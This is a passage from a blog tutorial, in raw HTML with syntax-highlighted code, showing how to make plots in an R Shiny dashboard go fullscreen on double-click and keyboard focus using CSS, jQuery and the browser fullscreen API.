&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mono&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid.minor.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid.minor.y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;salesPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;sales&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of sales\n&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;volumePlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;volume&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Total value of sales\n(millions)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;medianPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;median&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Total value of sales\n(millions)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;listingsPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;listings&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Total active listings\n&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;details&gt;&lt;summary&gt;&lt;code&gt;shinyApp&lt;/code&gt; call&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui, server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;The accompanying CSS file is very short:&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;www/style.css&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;h2&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;height&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;190&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;pointer&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fullscreen&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;default&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;last-child&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Opening this app in a desktop browser and you should see something like this:&lt;/p&gt;
&lt;img src="assets/main.jpg" srcset="assets/main@2x.jpg 2x" alt="Screenshot of the toy Shiny application on page load in the desktop version of Chrome" style="max-width: 750px; display: block; margin-left: auto; margin-right: auto" /&gt;
&lt;p&gt;One thing of note from the &lt;code&gt;ui&lt;/code&gt; function: I set the heights of the plots to be 100% of their containers:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;salesPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The heights of the containers themselves were then set in the CSS file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;height&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;190&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;pointer&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From the above R-code snippet you will also see that I gave the containers a tabindex value of &amp;ldquo;0&amp;rdquo;. I&amp;rsquo;ll explain why later.&lt;/p&gt;
&lt;aside&gt;
&lt;h3 id="aside-ugly-hacks"&gt;Aside: ugly hacks&lt;/h3&gt;
&lt;p&gt;Notice that the four plots are all created as separate images, not as a single matrix. This is so that they can separately be fullscreened, as we&amp;rsquo;ll see shortly. However, because the charts are independent of each other and the y axes have different units and labels, out of the box the horizontal axes did not line up. To get around these issues I implemented a few hacks in the &lt;code&gt;server&lt;/code&gt; function. There are probably better solutions out there, but I:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;(pre-)padded the y-axis labels with whitespace so all labels had the same number of characters,&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formatLabels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(label) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_pad&lt;/span&gt;(label, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, pad &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; &amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;set the axis-label font to &amp;ldquo;mono&amp;rdquo; so all the equal-length labels took up the same space,&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mono&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;added a newline character at the end of the shorter y-axis labels so that they took up two lines of space like the longer y-axis labels.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;salesPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;sales&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of sales\n&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/aside&gt;
&lt;h2 id="the-basic-javascript"&gt;The Basic JavaScript&lt;/h2&gt;
&lt;p&gt;While it&amp;rsquo;s perfectly possible to use the fullscreen API with only &lt;a href="https://stackoverflow.com/a/20435744" rel="external"&gt;vanilla JavaScript&lt;/a&gt;, Shiny already adds &lt;a href="https://jquery.com/" rel="external"&gt;jQuery&lt;/a&gt; to the page (aliased as &lt;code&gt;$&lt;/code&gt;) so we&amp;rsquo;ll use it for convenience and brevity. We&amp;rsquo;ll begin by using the &lt;code&gt;ready&lt;/code&gt; method to ensure the code inside the supplied function isn&amp;rsquo;t run until the page has loaded and our plot containers are a part of it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;use strict&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Interesting code goes here
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing we can do is check if the fullscreen API is actually supported. If it&amp;rsquo;s not we can give up straight away.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;document.fullscreenEnabled)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we&amp;rsquo;ll add a helper function to check whether fullscreen mode is already in action:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; isFullscreen() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!!&lt;/span&gt;document.fullscreenElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This function is very simple and isn&amp;rsquo;t necessary, but (I think) it does make the later code we&amp;rsquo;ll see a little easier to read.&lt;/p&gt;
&lt;p&gt;Now let&amp;rsquo;s use jQuery again to grab our plot containers:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; $plotContainers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; $(&lt;span style="color:#a5d6ff"&gt;&amp;#39;.plot-container&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and add a very simple event handler to them for when they are double-clicked on:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$plotContainers.on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;dblclick&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line of the body checks we&amp;rsquo;re not already in fullscreen. The second line uses the special &lt;code&gt;this&lt;/code&gt; variable. Inside jQuery event handlers, &lt;code&gt;this&lt;/code&gt; refers to the specific document element on which the event listener was triggered so all we need to do with it is &lt;code&gt;requestFullscreen&lt;/code&gt;. And that&amp;rsquo;s it! Double-click on/near a plot and it will go fullscreen and look something like this:&lt;/p&gt;
&lt;img src="assets/fullscreen.jpg" srcset="assets/fullscreen@2x.jpg 2x" alt="Screenshot of the toy Shiny application with one plot made fullscreen" style="max-width: 750px; display: block; margin-left: auto; margin-right: auto" /&gt;
&lt;p&gt;You&amp;rsquo;ll see &amp;mdash; if you try this for yourself &amp;mdash; that not only does the container resize, the plot does shortly after. &lt;em&gt;I&lt;/em&gt; didn&amp;rsquo;t have to write any JavaScript to make the latter trick happen. The only thing I had to do was, as mentioned earlier, set the plots to be 100% the height of their container (the width already is by default) in the R code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plotOutput(&lt;span style="color:#a5d6ff"&gt;&amp;#34;salesPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When the browser put the plot container into fullscreen it forces that element to be 100% wide and tall (superseding the &amp;ldquo;190px&amp;rdquo; value I set in the CSS). After that happens, the Shiny JavaScript code magically (I&amp;rsquo;m 90% sure it&amp;rsquo;s not actually magic) notices the image is too small and requests a new, bigger, one from the server.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s one other tiny little tweak that&amp;rsquo;s worth mentioning. The CSS sets the cursor style to &lt;code&gt;pointer&lt;/code&gt; for the plot containers (hoping to remind an informed user the plot can be blown up if double clicked). The following rule makes use of the &lt;code&gt;:fullscreen&lt;/code&gt; pseudoclass to unset it again when (double)-clicking no longer has an effect:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fullscreen&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;default&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You could, of course, use double-click to exit fullscreen, too. But the browser will provide the user with means to exit (press Esc, click a button) and using double-click to make something smaller doesn&amp;rsquo;t feel intuitive to me .&lt;/p&gt;
&lt;h2 id="adding-keyboard-functionality"&gt;Adding keyboard functionality&lt;/h2&gt;
&lt;p&gt;You&amp;rsquo;ll recall I mentioned adding a &lt;code&gt;tabindex&lt;/code&gt; value of &amp;ldquo;0&amp;rdquo; to each of the plot containers. This means they can be focused by a keyboard user who uses the &amp;ldquo;Tab&amp;rdquo; key to move around the page.&lt;/p&gt;
&lt;img src="assets/keyboard.jpg" srcset="assets/keyboard@2x.jpg 2x" alt="Screenshot of the toy Shiny application with one plot keyboard focused" style="max-width: 750px; display: block; margin-left: auto; margin-right: auto" /&gt;
&lt;p&gt;With a little extra JavaScript we can make the fullscreen behaviour keyboard accessible:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(document).on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;keydown&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(event) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; code &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; event.originalEvent.code;
